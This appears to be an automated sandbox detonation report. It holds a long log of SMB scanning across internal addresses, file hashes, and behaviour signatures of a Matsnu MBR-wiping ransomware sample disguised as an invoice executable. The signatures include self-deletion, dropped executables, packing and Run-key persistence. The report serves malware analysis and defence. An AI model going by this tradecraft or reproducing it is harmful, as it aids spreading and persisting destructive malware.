US 8.8.8.8:53 132.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
N/A 10.127.1.19:445 tcp
N/A 10.127.1.19:139 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.139:139 tcp
N/A 10.127.0.138:139 tcp
N/A 10.127.0.137:139 tcp
N/A 10.127.0.136:139 tcp
N/A 10.127.1.20:445 tcp
N/A 10.127.1.20:139 tcp
N/A 10.127.1.21:445 tcp
N/A 10.127.1.21:139 tcp
N/A 10.127.1.22:445 tcp
N/A 10.127.1.22:139 tcp
N/A 10.127.1.23:445 tcp
N/A 10.127.1.23:139 tcp
N/A 10.127.1.24:445 tcp
N/A 10.127.1.24:139 tcp
N/A 10.127.1.25:445 tcp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.0.127.10.in-addr.arpa udp
N/A 10.127.1.25:139 tcp
N/A 10.127.1.26:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.1.26:139 tcp
N/A 10.127.0.142:139 tcp
N/A 10.127.0.140:139 tcp
N/A 10.127.0.143:139 tcp
N/A 10.127.0.141:139 tcp
N/A 10.127.1.27:445 tcp
N/A 10.127.1.27:139 tcp
N/A 10.127.1.28:445 tcp
N/A 10.127.1.28:139 tcp
N/A 10.127.1.29:445 tcp
N/A 10.127.1.29:139 tcp
N/A 10.127.1.30:445 tcp
N/A 10.127.1.30:139 tcp
N/A 10.127.1.31:445 tcp
N/A 10.127.1.31:139 tcp
N/A 10.127.1.32:445 tcp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
N/A 10.127.1.32:139 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.1.33:445 tcp
N/A 10.127.0.147:139 tcp
N/A 10.127.0.145:139 tcp
N/A 10.127.0.144:139 tcp
N/A 10.127.0.146:139 tcp
N/A 10.127.1.33:139 tcp
N/A 10.127.1.34:445 tcp
N/A 10.127.1.34:139 tcp
N/A 10.127.1.35:445 tcp
N/A 10.127.1.35:139 tcp
N/A 10.127.1.36:445 tcp
N/A 10.127.1.36:139 tcp
N/A 10.127.1.37:445 tcp
N/A 10.127.1.37:139 tcp
N/A 10.127.1.38:445 tcp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
N/A 10.127.1.38:139 tcp
N/A 10.127.1.39:445 tcp
N/A 10.127.1.39:139 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.149:139 tcp
N/A 10.127.0.148:139 tcp
N/A 10.127.0.151:139 tcp
N/A 10.127.0.150:139 tcp
N/A 10.127.1.40:445 tcp
N/A 10.127.1.40:139 tcp
N/A 10.127.1.41:445 tcp
N/A 10.127.1.41:139 tcp
N/A 10.127.1.42:445 tcp
N/A 10.127.1.42:139 tcp
N/A 10.127.1.43:445 tcp
N/A 10.127.1.43:139 tcp
US 13.107.253.64:445 tcp
N/A 10.127.1.44:445 tcp
N/A 10.127.1.44:139 tcp
N/A 10.127.1.45:445 tcp
N/A 10.127.1.45:139 tcp
US 8.8.8.8:53 149.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.0.127.10.in-addr.arpa udp
N/A 10.127.1.46:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.1.46:139 tcp
N/A 10.127.0.154:139 tcp
N/A 10.127.0.152:139 tcp
N/A 10.127.0.155:139 tcp
N/A 10.127.0.153:139 tcp
N/A 10.127.1.47:445 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.1.47:139 tcp
N/A 10.127.1.48:445 tcp
N/A 10.127.1.48:139 tcp
N/A 10.127.1.49:445 tcp
N/A 10.127.1.49:139 tcp
N/A 10.127.1.50:445 tcp
NL 154.61.71.13:445 tcp
N/A 10.127.1.50:139 tcp
N/A 10.127.1.51:445 tcp
N/A 10.127.1.51:139 tcp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
N/A 10.127.1.52:445 tcp
N/A 10.127.1.52:139 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.1.53:445 tcp
N/A 10.127.0.157:139 tcp
N/A 10.127.0.158:139 tcp
N/A 10.127.0.159:139 tcp
N/A 10.127.0.156:139 tcp
N/A 10.127.1.53:139 tcp
GB 142.250.179.234:445 chromewebstore.googleapis.com tcp
N/A 10.127.1.54:445 tcp
N/A 10.127.1.54:139 tcp
N/A 10.127.1.55:445 tcp
N/A 10.127.1.55:139 tcp
N/A 10.127.1.56:445 tcp
N/A 10.127.1.56:139 tcp
US 104.208.16.95:445 self.events.data.microsoft.com tcp
N/A 10.127.1.57:445 tcp
N/A 10.127.1.57:139 tcp
N/A 10.127.1.58:445 tcp
N/A 10.127.1.58:139 tcp
US 8.8.8.8:53 158.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
N/A 10.127.1.59:445 tcp
N/A 10.127.1.59:139 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.162:139 tcp
N/A 10.127.0.161:139 tcp
N/A 10.127.0.160:139 tcp
N/A 10.127.0.163:139 tcp
N/A 10.127.1.60:445 tcp
N/A 10.127.1.60:139 tcp
N/A 10.127.1.61:445 tcp
N/A 10.127.1.61:139 tcp
N/A 10.127.1.62:445 tcp
N/A 10.127.1.62:139 tcp
N/A 10.127.1.63:445 tcp
US 13.107.42.16:445 config.edge.skype.com tcp
N/A 10.127.1.63:139 tcp
N/A 10.127.1.64:445 tcp
N/A 10.127.1.64:139 tcp
N/A 10.127.1.65:445 tcp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
N/A 10.127.1.65:139 tcp
N/A 10.127.1.66:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.166:139 tcp
N/A 10.127.0.165:139 tcp
N/A 10.127.0.164:139 tcp
N/A 10.127.0.167:139 tcp
N/A 10.127.1.66:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.1.67:445 tcp
N/A 10.127.1.67:139 tcp
N/A 10.127.1.68:445 tcp
N/A 10.127.1.68:139 tcp
N/A 10.127.1.69:445 tcp
N/A 10.127.1.69:139 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.1.70:445 tcp
N/A 10.127.1.70:139 tcp
N/A 10.127.1.71:445 tcp
N/A 10.127.1.71:139 tcp
US 8.8.8.8:53 166.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
N/A 10.127.1.72:445 tcp
N/A 10.127.1.72:139 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.1.73:445 tcp
N/A 10.127.0.169:139 tcp
N/A 10.127.0.170:139 tcp
N/A 10.127.0.168:139 tcp
N/A 10.127.0.171:139 tcp
N/A 10.127.1.73:139 tcp
N/A 10.127.1.74:445 tcp
N/A 10.127.1.74:139 tcp
N/A 10.127.1.75:445 tcp
N/A 10.127.1.75:139 tcp
N/A 10.127.1.76:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.1.76:139 tcp
N/A 10.127.1.77:445 tcp
N/A 10.127.1.77:139 tcp
N/A 10.127.1.78:445 tcp
US 8.8.8.8:53 169.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.0.127.10.in-addr.arpa udp
N/A 10.127.1.78:139 tcp
N/A 10.127.1.79:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.1.79:139 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.172:139 tcp
N/A 10.127.0.173:139 tcp
N/A 10.127.0.174:139 tcp
N/A 10.127.0.175:139 tcp
N/A 10.127.1.80:445 tcp
N/A 10.127.1.80:139 tcp
N/A 10.127.1.81:445 tcp
N/A 10.127.1.81:139 tcp
N/A 10.127.1.82:445 tcp
N/A 10.127.1.82:139 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.1.83:445 tcp
N/A 10.127.1.83:139 tcp
N/A 10.127.1.84:445 tcp
N/A 10.127.1.84:139 tcp
N/A 10.127.1.85:445 tcp
US 8.8.8.8:53 172.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.0.127.10.in-addr.arpa udp
N/A 10.127.1.85:139 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.1.86:445 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.177:139 tcp
N/A 10.127.0.178:139 tcp
N/A 10.127.0.176:139 tcp
N/A 10.127.0.179:139 tcp
N/A 10.127.1.86:139 tcp
N/A 10.127.1.87:445 tcp
N/A 10.127.1.87:139 tcp
N/A 10.127.1.88:445 tcp
N/A 10.127.1.88:139 tcp
N/A 10.127.1.89:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.1.89:139 tcp
N/A 10.127.1.90:445 tcp
N/A 10.127.1.90:139 tcp
N/A 10.127.1.91:445 tcp
N/A 10.127.1.91:139 tcp
US 8.8.8.8:53 176.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.0.127.10.in-addr.arpa udp
N/A 10.127.1.92:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.1.92:139 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.1.93:445 tcp
N/A 10.127.0.181:139 tcp
N/A 10.127.0.180:139 tcp
N/A 10.127.0.182:139 tcp
N/A 10.127.0.183:139 tcp
N/A 10.127.1.93:139 tcp
N/A 10.127.1.94:445 tcp
N/A 10.127.1.94:139 tcp
N/A 10.127.1.95:445 tcp
N/A 10.127.1.95:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.1.96:445 tcp
N/A 10.127.1.96:139 tcp
N/A 10.127.1.97:445 tcp
N/A 10.127.1.97:139 tcp
N/A 10.127.1.98:445 tcp
US 8.8.8.8:53 181.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.0.127.10.in-addr.arpa udp
N/A 10.127.1.98:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.1.99:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.1.99:139 tcp
N/A 10.127.0.186:139 tcp
N/A 10.127.0.185:139 tcp
N/A 10.127.0.184:139 tcp
N/A 10.127.0.187:139 tcp
N/A 10.127.1.100:445 tcp
N/A 10.127.1.100:139 tcp
N/A 10.127.1.101:445 tcp
N/A 10.127.1.101:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.1.102:445 tcp
N/A 10.127.1.102:139 tcp
N/A 10.127.1.103:445 tcp
N/A 10.127.1.103:139 tcp
N/A 10.127.1.104:445 tcp
N/A 10.127.1.104:139 tcp
N/A 10.127.1.105:445 tcp
US 8.8.8.8:53 186.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.0.127.10.in-addr.arpa udp
N/A 10.127.0.14:445 tcp
N/A 10.127.1.105:139 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.1.106:445 tcp
N/A 10.127.0.188:139 tcp
N/A 10.127.0.191:139 tcp
N/A 10.127.0.189:139 tcp
N/A 10.127.0.190:139 tcp
N/A 10.127.1.106:139 tcp
N/A 10.127.1.107:445 tcp
N/A 10.127.1.107:139 tcp
N/A 10.127.1.108:445 tcp
N/A 10.127.1.108:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.1.109:445 tcp
N/A 10.127.1.109:139 tcp
N/A 10.127.1.110:445 tcp
N/A 10.127.1.110:139 tcp
N/A 10.127.1.111:445 tcp
N/A 10.127.1.111:139 tcp
US 8.8.8.8:53 188.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.0.127.10.in-addr.arpa udp
N/A 10.127.0.16:445 tcp
N/A 10.127.1.112:445 tcp
N/A 10.127.1.112:139 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.192:139 tcp
N/A 10.127.0.195:139 tcp
N/A 10.127.0.194:139 tcp
N/A 10.127.0.193:139 tcp
N/A 10.127.1.113:445 tcp
N/A 10.127.1.113:139 tcp
N/A 10.127.1.114:445 tcp
N/A 10.127.1.114:139 tcp
N/A 10.127.1.115:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.1.115:139 tcp
N/A 10.127.1.116:445 tcp
N/A 10.127.1.116:139 tcp
N/A 10.127.1.117:445 tcp
N/A 10.127.1.117:139 tcp
N/A 10.127.1.118:445 tcp
N/A 10.127.0.18:445 tcp
US 8.8.8.8:53 192.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.0.127.10.in-addr.arpa udp
N/A 10.127.1.118:139 tcp
N/A 10.127.1.119:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.1.119:139 tcp
N/A 10.127.0.196:139 tcp
N/A 10.127.0.198:139 tcp
N/A 10.127.0.199:139 tcp
N/A 10.127.0.197:139 tcp
N/A 10.127.1.120:445 tcp
N/A 10.127.1.120:139 tcp
N/A 10.127.1.121:445 tcp
N/A 10.127.1.121:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.1.122:445 tcp
N/A 10.127.1.122:139 tcp
N/A 10.127.1.123:445 tcp
N/A 10.127.1.123:139 tcp
N/A 10.127.1.124:445 tcp
N/A 10.127.1.124:139 tcp
N/A 10.127.0.20:445 tcp
US 8.8.8.8:53 196.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.0.127.10.in-addr.arpa udp
N/A 10.127.1.125:445 tcp
N/A 10.127.1.125:139 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.1.126:445 tcp
N/A 10.127.0.201:139 tcp
N/A 10.127.0.200:139 tcp
N/A 10.127.0.203:139 tcp
N/A 10.127.0.202:139 tcp
N/A 10.127.1.126:139 tcp
N/A 10.127.1.127:445 tcp
N/A 10.127.1.127:139 tcp
N/A 10.127.1.128:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.1.128:139 tcp
N/A 10.127.1.129:445 tcp
N/A 10.127.1.129:139 tcp
N/A 10.127.1.130:445 tcp
N/A 10.127.1.130:139 tcp
N/A 10.127.1.131:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.1.131:139 tcp
US 8.8.8.8:53 201.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.0.127.10.in-addr.arpa udp
N/A 10.127.1.132:445 tcp
N/A 10.127.1.132:139 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.204:139 tcp
N/A 10.127.0.205:139 tcp
N/A 10.127.0.206:139 tcp
N/A 10.127.0.207:139 tcp
N/A 10.127.1.133:445 tcp
N/A 10.127.1.133:139 tcp
N/A 10.127.1.134:445 tcp
N/A 10.127.1.134:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.1.135:445 tcp
N/A 10.127.1.135:139 tcp
N/A 10.127.1.136:445 tcp
N/A 10.127.1.136:139 tcp
N/A 10.127.1.137:445 tcp
N/A 10.127.1.137:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.1.138:445 tcp
US 8.8.8.8:53 206.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.0.127.10.in-addr.arpa udp
N/A 10.127.1.138:139 tcp
N/A 10.127.1.139:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.208:139 tcp
N/A 10.127.0.209:139 tcp
N/A 10.127.0.211:139 tcp
N/A 10.127.0.210:139 tcp
N/A 10.127.1.139:139 tcp
N/A 10.127.1.140:445 tcp
N/A 10.127.1.140:139 tcp
N/A 10.127.1.141:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.1.141:139 tcp
N/A 10.127.1.142:445 tcp
N/A 10.127.1.142:139 tcp
N/A 10.127.1.143:445 tcp
N/A 10.127.1.143:139 tcp
N/A 10.127.1.144:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.1.144:139 tcp
US 8.8.8.8:53 208.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.0.127.10.in-addr.arpa udp
N/A 10.127.1.145:445 tcp
N/A 10.127.1.145:139 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.212:139 tcp
N/A 10.127.1.146:445 tcp
N/A 10.127.0.213:139 tcp
N/A 10.127.0.215:139 tcp
N/A 10.127.0.214:139 tcp
N/A 10.127.1.146:139 tcp
N/A 10.127.1.147:445 tcp
N/A 10.127.1.147:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.1.148:445 tcp
N/A 10.127.1.148:139 tcp
N/A 10.127.1.149:445 tcp
N/A 10.127.1.149:139 tcp
N/A 10.127.1.150:445 tcp
N/A 10.127.1.150:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.1.151:445 tcp
N/A 10.127.1.151:139 tcp
US 8.8.8.8:53 212.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.0.127.10.in-addr.arpa udp
N/A 10.127.1.152:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.1.152:139 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.216:139 tcp
N/A 10.127.0.217:139 tcp
N/A 10.127.0.218:139 tcp
N/A 10.127.0.219:139 tcp
N/A 10.127.1.153:445 tcp
N/A 10.127.1.153:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.1.154:445 tcp
N/A 10.127.1.154:139 tcp
N/A 10.127.1.155:445 tcp
N/A 10.127.1.155:139 tcp
N/A 10.127.1.156:445 tcp
N/A 10.127.1.156:139 tcp
N/A 10.127.1.157:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.1.157:139 tcp
US 8.8.8.8:53 216.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.0.127.10.in-addr.arpa udp
N/A 10.127.1.158:445 tcp
US 8.8.8.8:53 218.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.0.127.10.in-addr.arpa udp
N/A 10.127.1.158:139 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.1.159:445 tcp
N/A 10.127.0.220:139 tcp
N/A 10.127.0.221:139 tcp
N/A 10.127.0.222:139 tcp
N/A 10.127.0.223:139 tcp
N/A 10.127.1.159:139 tcp
N/A 10.127.1.160:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.1.160:139 tcp
N/A 10.127.1.161:445 tcp
N/A 10.127.1.161:139 tcp
N/A 10.127.1.162:445 tcp
N/A 10.127.1.162:139 tcp
N/A 10.127.1.163:445 tcp
N/A 10.127.1.163:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.1.164:445 tcp
N/A 10.127.1.164:139 tcp
US 8.8.8.8:53 220.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.0.127.10.in-addr.arpa udp
N/A 10.127.1.165:445 tcp
N/A 10.127.1.165:139 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.1.166:445 tcp
N/A 10.127.0.224:139 tcp
N/A 10.127.0.225:139 tcp
N/A 10.127.0.227:139 tcp
N/A 10.127.0.226:139 tcp
N/A 10.127.1.166:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.1.167:445 tcp
N/A 10.127.1.167:139 tcp
N/A 10.127.1.168:445 tcp
N/A 10.127.1.168:139 tcp
N/A 10.127.1.169:445 tcp
N/A 10.127.1.169:139 tcp
N/A 10.127.1.170:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.1.170:139 tcp
N/A 10.127.1.171:445 tcp
US 8.8.8.8:53 224.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.0.127.10.in-addr.arpa udp
N/A 10.127.1.171:139 tcp
N/A 10.127.1.172:445 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.1.172:139 tcp
N/A 10.127.0.228:139 tcp
N/A 10.127.0.229:139 tcp
N/A 10.127.0.230:139 tcp
N/A 10.127.0.231:139 tcp
N/A 10.127.1.173:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.1.173:139 tcp
N/A 10.127.1.174:445 tcp
N/A 10.127.1.174:139 tcp
N/A 10.127.1.175:445 tcp
N/A 10.127.1.175:139 tcp
N/A 10.127.1.176:445 tcp
N/A 10.127.1.176:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.1.177:445 tcp
N/A 10.127.1.177:139 tcp
N/A 10.127.1.178:445 tcp
US 8.8.8.8:53 228.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.0.127.10.in-addr.arpa udp
N/A 10.127.1.178:139 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.1.179:445 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.232:139 tcp
N/A 10.127.0.233:139 tcp
N/A 10.127.0.234:139 tcp
N/A 10.127.0.235:139 tcp
N/A 10.127.1.179:139 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.1.180:445 tcp
N/A 10.127.1.180:139 tcp
N/A 10.127.1.181:445 tcp
N/A 10.127.1.181:139 tcp
N/A 10.127.1.182:445 tcp
N/A 10.127.1.182:139 tcp
N/A 10.127.1.183:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.1.183:139 tcp
N/A 10.127.1.184:445 tcp
N/A 10.127.1.184:139 tcp
US 8.8.8.8:53 232.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.0.127.10.in-addr.arpa udp
N/A 10.127.1.185:445 tcp
N/A 10.127.1.185:139 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.1.186:445 tcp
N/A 10.127.0.236:139 tcp
N/A 10.127.0.237:139 tcp
N/A 10.127.0.239:139 tcp
N/A 10.127.0.238:139 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.1.186:139 tcp
N/A 10.127.1.187:445 tcp
N/A 10.127.1.187:139 tcp
N/A 10.127.1.188:445 tcp
N/A 10.127.1.188:139 tcp
N/A 10.127.1.189:445 tcp
N/A 10.127.1.189:139 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.1.190:445 tcp

Files

memory/4844-0-0x0000000002FA0000-0x0000000002FFE000-memory.dmp

memory/4844-8-0x0000000002FA0000-0x0000000002FFE000-memory.dmp

memory/4844-9-0x0000000002FA0000-0x0000000002FFE000-memory.dmp

memory/4844-10-0x0000000002FA0000-0x0000000002FFE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E659.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/4844-22-0x0000000002FA0000-0x0000000002FFE000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240611-en

Max time kernel

1750s

Max time network

1754s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
